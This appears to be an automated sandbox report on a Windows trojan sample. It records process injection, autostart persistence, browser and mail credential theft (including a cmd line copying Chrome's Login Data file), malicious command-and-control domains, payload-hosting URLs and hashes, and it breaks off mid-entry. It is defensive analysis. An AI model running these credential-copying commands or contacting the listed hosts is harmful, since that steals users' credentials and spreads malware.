            Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe
            Source: C:\Users\user\Desktop\TR0627729920002.exe | Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 3440000
            Source: C:\Users\user\Desktop\TR0627729920002.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: explorer.exe, 00000007.00000000.350508051.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.281636648.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.441279364.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanEXE^
            Source: explorer.exe, 00000007.00000000.291986070.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.362079139.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.358486470.0000000005920000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.350564915.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.374071514.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.441429603.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd4
            Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: WProgram Manager
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
            Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

            Remote Access Functionality

            Source: Yara match | File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK Matrix (techniques listed per tactic column; the number in parentheses is the count the report attaches to that technique)

            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Shared Modules (1); Exploitation for Client Execution (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
            Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (11); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
            Privilege Escalation: DLL Side-Loading (1); Process Injection (912); Registry Run Keys / Startup Folder (11); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (2); Process Injection (912); Rundll32 (1)
            Credential Access: OS Credential Dumping (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: File and Directory Discovery (1); System Information Discovery (13); Query Registry (1); Security Software Discovery (221); Virtualization/Sandbox Evasion (2); Process Discovery (2); Remote System Discovery (1); Network Service Scanning; System Network Connections Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Command and Control: Ingress Tool Transfer (3); Encrypted Channel (11); Non-Application Layer Protocol (4); Application Layer Protocol (115); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 680563
Sample: TR0627729920002.exe
Startdate: 08/08/2022
Architecture: WINDOWS
Score: 100

Start
  DNS/IP: www.wellkept.info; www.meigsbuilds.online; 3 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 6 other signatures
  started: TR0627729920002.exe
    DNS/IP: l-0004.l-dc-msedge.net 13.107.43.13, 443, 49728, 49737 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; 192.168.2.1 unknown unknown; 3 other IPs or domains
    Dropped: C:\Users\Public\Libraries\Jwjxmakrv.exe, PE32; C:\Users\...\Jwjxmakrv.exe:Zone.Identifier, ASCII
    Signatures: Creates multiple autostart registry keys; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
    started: cmd.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
      injected: explorer.exe
        DNS/IP: naturathome.info 81.169.145.158, 49823, 80 STRATOSTRATOAGDE Germany; www.trendiddas.com 5.183.8.187, 49855, 80 INTERXSCH Germany; 17 other IPs or domains
        Dropped: C:\Users\user\AppData\...\IconCachet0hh.exe, PE32
        Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Performs DNS queries to domains with low reputation; Drops or copies cmd.exe with a different name (likely to bypass HIPS)
        started: rundll32.exe
          Signatures: Tries to steal Mail credentials (via file / registry access); Creates multiple autostart registry keys; Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
          started: cmd.exe
            Signatures: Tries to harvest and steal browser information (history, passwords, etc)
            started: conhost.exe
          started: cmd.exe
            started: conhost.exe
        started: Jwjxmakrv.exe
          DNS/IP: l-0003.l-dc-msedge.net 13.107.43.12, 443, 49746, 49748 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; ph-files.fe.1drv.com; 2 other IPs or domains
          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
          started: cmd.exe
            started: conhost.exe
        started: Jwjxmakrv.exe
          DNS/IP: ph-files.fe.1drv.com; onedrive.live.com; 2 other IPs or domains
          started: cmd.exe
            started: conhost.exe
        started: IconCachet0hh.exe
          started: conhost.exe
      started: conhost.exe

Source | Detection | Scanner | Label
TR0627729920002.exe | 29% | ReversingLabs | Win32.Trojan.Injuke
TR0627729920002.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Jwjxmakrv.exe | 100% | Joe Sandbox ML |
C:\Users\Public\Libraries\Jwjxmakrv.exe | 29% | ReversingLabs | Win32.Trojan.Injuke
C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe | 0% | ReversingLabs |

Source | Detection | Scanner | Label
5.2.cmd.exe.50410000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.cmd.exe.50410000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.cmd.exe.50410000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.TR0627729920002.exe.2162de8.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.TR0627729920002.exe.21dc808.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.0.cmd.exe.50410000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.cmd.exe.50410000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Source | Detection | Scanner | Label
kidsfundoor.com | 7% | Virustotal |

Source | Detection | Scanner | Label
http://www.trisuaka.xyz/uj3c/ | 100% | Avira URL Cloud | malware
http://www.nomaxdic.com/uj3c/ | 100% | Avira URL Cloud | malware
http://www.nomaxdic.com | 0% | Avira URL Cloud | safe
www.nutricognition.com/uj3c/ | 100% | Avira URL Cloud | malware
http://www.emerge.deDVarFileInfo$ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.trisuaka.xyz | 188.114.97.3 | true | true |  | unknown
kidsfundoor.com | 2.57.90.16 | true | true |  | unknown
www.trendiddas.com | 5.183.8.187 | true | true |  | unknown
l-0003.l-dc-msedge.net | 13.107.43.12 | true | false |  | unknown
www.moneytaoism.com | 156.226.60.131 | true | true |  | unknown
parkingpage.namecheap.com | 198.54.117.218 | true | false |  | high
forummind.com | 35.244.105.10 | true | false |  | unknown
naturathome.info | 81.169.145.158 | true | true |  | unknown
l-0004.l-dc-msedge.net | 13.107.43.13 | true | false |  | unknown
nutricognition.com | 34.102.136.180 | true | false |  | unknown
www.nomaxdic.com | 38.54.163.57 | true | true |  | unknown
wellkept.info | 15.197.142.173 | true | true |  | unknown
www.empireapothecary.com | 154.55.180.56 | true | true |  | unknown
www.meigsbuilds.online | 209.17.116.163 | true | true |  | unknown
www.gografic.com | unknown | unknown | true |  | unknown
2q5ira.ph.files.1drv.com | unknown | unknown | false |  | high
www.naturathome.info | unknown | unknown | true |  | unknown
www.6111.site | unknown | unknown | true |  | unknown
www.wellkept.info | unknown | unknown | true |  | unknown
www.forummind.com | unknown | unknown | true |  | unknown
onedrive.live.com | unknown | unknown | false |  | high
www.designgamagazine.com | unknown | unknown | true |  | unknown
www.kidsfundoor.com | unknown | unknown | true |  | unknown
www.choonchain.com | unknown | unknown | true |  | unknown
www.shopwithtrooperdavecom.com | unknown | unknown | true |  | unknown
www.huangse5.com | unknown | unknown | true |  | unknown
www.nutricognition.com | unknown | unknown | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.trisuaka.xyz/uj3c/ | true | Avira URL Cloud: malware | unknown
http://www.nomaxdic.com/uj3c/ | true | Avira URL Cloud: malware | unknown
https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 | false |  | high
https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1 | false |  | high
www.nutricognition.com/uj3c/ | true | Avira URL Cloud: malware | low
https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2If | false |  | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://onedrive.live.com/2A | Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2 | Jwjxmakrv.exe, 0000000E.00000002.354269896.0000000003598000.00000004.00001000.00020000.00000000.sdmp | false |  | high
https://2q5ira.ph.files.1drv.com/dK | Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfB | Jwjxmakrv.exe, 0000000E.00000003.319396319.00000000008F8000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://onedrive.live.com/k | Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa | Jwjxmakrv.exe, 00000008.00000003.290900186.00000000008CA000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://2q5ira.ph.files.1drv.com/ | Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xB | Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.296621597.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.289435198.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.325315312.000000000090C000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.317690202.0000000000900000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://www.nomaxdic.com | rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV51 | Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6Ib | Jwjxmakrv.exe, 0000000E.00000003.316208412.00000000008F8000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://2q5ira.ph.files.1drv.com/9 | Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://onedrive.live.com/ | Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp | false |  | high
http://www.emerge.deDVarFileInfo$ | TR0627729920002.exe, Jwjxmakrv.exe.0.dr | false | Avira URL Cloud: safe | low
https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzP | Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp | false |  | high
IP | Domain | Country | ASN | ASN Name | Malicious
81.169.145.158 | naturathome.info | Germany | 6724 | STRATOSTRATOAGDE | true
198.54.117.218 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false
154.55.180.56 | www.empireapothecary.com | United States | 174 | COGENT-174US | true
13.107.43.12 | l-0003.l-dc-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
13.107.43.13 | l-0004.l-dc-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
5.183.8.187 | www.trendiddas.com | Germany | 64463 | INTERXSCH | true
188.114.97.3 | www.trisuaka.xyz | European Union | 13335 | CLOUDFLARENETUS | true
156.226.60.131 | www.moneytaoism.com | Seychelles | 133201 | COMING-ASABCDEGROUPCOMPANYLIMITEDHK | true
34.102.136.180 | nutricognition.com | United States | 15169 | GOOGLEUS | false
38.54.163.57 | www.nomaxdic.com | United States | 174 | COGENT-174US | true
2.57.90.16 | kidsfundoor.com | Lithuania | 47583 | AS-HOSTINGERLT | true
209.17.116.163 | www.meigsbuilds.online | United States | 55002 | DEFENSE-NETUS | true
                                                                                                IP
                                                                                                192.168.2.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 680563
Start date and time: 2022-08-08 20:11:07 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 49s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: TR0627729920002.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@23/8@36/13
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 50%
                                                                                                HDC Information:
                                                                                                • Successful, ratio: 100% (good quality ratio 86.9%)
                                                                                                • Quality average: 71.7%
                                                                                                • Quality standard deviation: 33.4%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 74%
                                                                                                • Number of executed functions: 0
                                                                                                • Number of non-executed functions: 0
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Adjust boot time
                                                                                                • Enable AMSI
                                                                                                • Override analysis time to 240s for rundll32
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                • TCP Packets have been reduced to 100
                                                                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.12, 13.107.42.13
                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, ph-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, odc-ph-files-geo.onedrive.akadns.net, odc-ph-files-brs.onedrive.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                • Execution Graph export aborted for target TR0627729920002.exe, PID 5932 because there are no executed functions
                                                                                                • Not all processes were analyzed; the report is missing behavior information
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                Time | Type | Description
                                                                                                20:12:06 | API Interceptor | 1x Sleep call for process: TR0627729920002.exe modified
                                                                                                20:12:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv C:\Users\Public\Libraries\vrkamxjwJ.url
                                                                                                20:12:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv C:\Users\Public\Libraries\vrkamxjwJ.url
                                                                                                20:12:28 | API Interceptor | 2x Sleep call for process: Jwjxmakrv.exe modified
                                                                                                20:15:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
                                                                                                20:15:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
                                                                                                Process:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):938496
                                                                                                Entropy (8bit):7.259958009937081
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:xnMYEbTjfaxtdqQVESreixHfk1PziiUS1yj:xnp8fs7/k1PLqj
                                                                                                MD5:8DBFE68662123710D83FEF939287D9A3
                                                                                                SHA1:9481EF5498DD490E4EFE83601F916EE48F61E649
                                                                                                SHA-256:663B7BC66499E507CA1F8FAD6E42195A54FE242DB3CC71BF4762952FE04CE5EE
                                                                                                SHA-512:2F3589181A606A3342726B92ECBDF722E43752A281A7E628DE44F142B75BB7150814D515D2C03495F52362106B3F9D8990DE4661E60CF8104F2F5EC6BCD161BC
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Process:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
